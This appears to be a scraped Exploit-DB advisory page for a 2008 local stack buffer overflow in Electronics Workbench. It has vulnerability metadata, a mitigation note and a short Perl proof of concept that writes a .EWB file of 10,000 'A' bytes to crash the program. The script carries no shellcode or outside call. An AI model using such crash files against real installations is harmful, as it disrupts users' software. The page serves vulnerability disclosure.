Local .EWB File Stack Buffer Overflow (PoC)

vendor:

Electronics Workbench

by:

Underz0ne Crew, Zigma

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Electronics Workbench

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Local .EWB File Stack Buffer Overflow (PoC)

A buffer overflow vulnerability exists in Electronics Workbench, which is caused by improper bounds checking of user-supplied data. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is triggered when a specially crafted .EWB file is opened, which causes a stack-based buffer overflow. This can result in arbitrary code execution.

Mitigation:

Upgrade to the latest version of Electronics Workbench.

Source

Exploit-DB raw data:

#!/usr/local/bin/perl 
#
#
# OOO OOO             OO                            OOO                                
#  O   O               O                           O   O
#  O   O               O                           O   O
#  O   O  OO OO    OOOOO   OOOOO  OOO OO  OOOOOO   O   O  OO OO    OOOOO
#  O   O   OO  O  O    O  O     O   OO  O O   O    O   O   OO  O  O     O
#  O   O   O   O  O    O  OOOOOOO   O        O     O   O   O   O  OOOOOOO
#  O   O   O   O  O    O  O         O       O      O   O   O   O  O
#  O   O   O   O  O    O  O     O   O      O   O   O   O   O   O  O     O
#   OOO   OOO OOO  OOOOOO  OOOOO  OOOOO   OOOOOO    OOO   OOO OOO  OOOOO                                                                                        
#
# [+] Application               : Electronics Workbench
# 
# [+] Application's Description : (" Electronics Workbench sets the standard for affordable simulators.
#                                    The tight integration of its schematic editor, SPICE simulator and
#                                    on-screen waveforms makes what-if scenarios easy and instant.
#                                    The exceptional features of this latest release will come as no
#                                    surprise to our 80,000 previous customers. Value, power and ease of
#                                    use are what Electronics Workbench has always stood for.")
#                                    
# [+] Bug                       : Local .EWB File Stack Buffer Overflow (PoC)
# 
# [+] Author                    : Underz0ne Crew
#                                 Zigma
#
# I just got the program from my Elctronic's professor , Instead of simulating my homework I fuzzed it , I think I m geek :S , whatever 
#
$filename = "fuzz.ewb";

$overflow = "A" x 10000;

print "\n\n[+] Evil file to fuzz : $filename ...\r\n";
sleep(2);

open(ewb, ">./$filename") || die "\nCannot open $filename: $!";

print ewb "$overflow";

close (ewb);

print "\n[+]  file successfully created!\r\n";

# milw0rm.com [2008-11-30]